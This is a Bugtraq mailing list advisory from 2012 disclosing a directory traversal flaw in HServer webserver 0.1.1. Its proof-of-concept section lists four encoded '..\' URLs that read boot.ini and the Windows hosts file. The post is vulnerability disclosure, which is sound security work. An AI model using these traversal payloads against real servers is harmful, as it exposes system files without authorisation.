Bugtraq mailing list archives

HServer webserver - Directory Traversal Vulnerability

From: demonalex () 163 com
Date: Thu, 5 Jan 2012 06:07:56 GMT

Title: HServer webserver - Directory Traversal Vulnerability

Software : HServer webserver

Software Version : 0.1.1

Vendor: http://www.luizpicanco.com/index.php?s=hserver
        http://code.google.com/p/hserver/

Vulnerability Published : 2012-01-05

Vulnerability Update Time :

Status :

Impact : High

Bug Description :
HServer webserver(version update : 0.1.1) is a tiny Web server written in Java, it is vulnerable with Directory 
Traversal Vulnerability.

Proof Of Concept :
http://127.0.0.1:8081/..%5c..%5c..%5cboot.ini
http://127.0.0.1:8081/..%5c..%5c..%5cwindows%5csystem32%5cdrivers%5cetc%5chosts
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini
http://127.0.0.1:8081/%2e%2e%5c%2e%2e%5c%2e%2e%5cwindows%5csystem32%5cdrivers%5cetc%5chosts

Credits : This vulnerability was discovered by demonalex () 163 com
mail: demonalex () 163 com / ChaoYi.Huang () connect polyu hk
Pentester/Researcher
Dark2S Security Team/PolyU.HK

Current thread:

HServer webserver - Directory Traversal Vulnerability demonalex (Jan 05)